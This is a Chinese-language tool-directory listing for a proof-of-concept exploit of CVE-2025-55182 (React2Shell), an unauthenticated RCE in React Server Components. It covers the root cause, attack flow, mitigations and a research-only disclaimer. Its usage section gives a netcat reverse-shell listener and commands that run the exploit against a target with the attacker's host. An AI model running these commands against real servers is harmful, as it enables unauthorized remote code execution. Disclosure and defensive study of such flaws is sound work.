Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-React2Shell-RCE — 概念验证漏洞利用,针对CVE-2025-55182 (React2Shell),一个通过精心构造的Flight协议载荷在React Server Components中实现未经身份验证的远程代码执行漏洞。 | Kitploit
工具/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育远程访问工具
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

概念验证漏洞利用,针对CVE-2025-55182 (React2Shell),一个通过精心构造的Flight协议载荷在React Server Components中实现未经身份验证的远程代码执行漏洞。

查看仓库
132个月前尚未审核

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell(React 服务端组件中的未认证 RCE)

CVE-2025-55182,又称 React2Shell,是一个严重的未认证远程代码执行(RCE) 漏洞,影响 React 服务端组件包(版本 19.0、19.1.0、19.1.1 和 19.2.0)。

该漏洞可能允许攻击者通过单个精心构造的 HTTP 请求在易受攻击的服务器上实现任意代码执行,无需进行身份验证。


概述

React 服务端组件使用 Flight 协议在客户端和服务器之间序列化和反序列化组件数据。

此反序列化过程中的不当验证可能允许精心构造的载荷操纵内部对象结构,并触及危险的 JavaScript 执行原语。


根本原因

该漏洞源于 React 服务端组件(RSC)Flight 协议载荷在反序列化过程中验证不充分。

精心构造的载荷可能:

  • 操纵内部对象结构
  • 遍历 JavaScript 原型链
  • 访问危险的 JavaScript 构造函数
  • 在服务器上实现任意代码执行

工作原理

  1. 漏洞利用发送一个精心构造的 multipart/form-data 请求
  2. 服务器将该请求解释为 React Flight 载荷
  3. 在反序列化过程中处理恶意数据块
  4. 该载荷:
    • 操纵内部执行流程
    • 触及危险的 JavaScript 执行原语
    • 执行任意代码
  5. 攻击者获得目标服务器上的远程代码执行能力

🚀 使用方法

在您的机器上启动监听器:

root@kitploit:~
nc -lvnp 4444

运行漏洞利用脚本:

root@kitploit:~
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

要求

  • 存在漏洞的 React / Next.js 版本
  • 启用了服务端 React 服务端组件
  • 可访问的 RSC 端点

缓解措施

为缓解此漏洞:

  • 升级 React 至可用的最新修补版本
  • 应用可用的框架补丁
  • 监控并阻止可疑的 RSC 请求

参考资料

  • OffSec – CVE-2025-55182 漏洞利用分析
  • Microsoft Security – 防御 React2Shell
  • React 安全公告(官方披露)

免责声明

本项目严格仅供以下用途:

  • 安全研究
  • 教育目的
  • 授权安全评估和渗透测试

作者对因使用本材料导致的误用或损害概不负责。用户有责任遵守所有适用的法律法规。

下载工具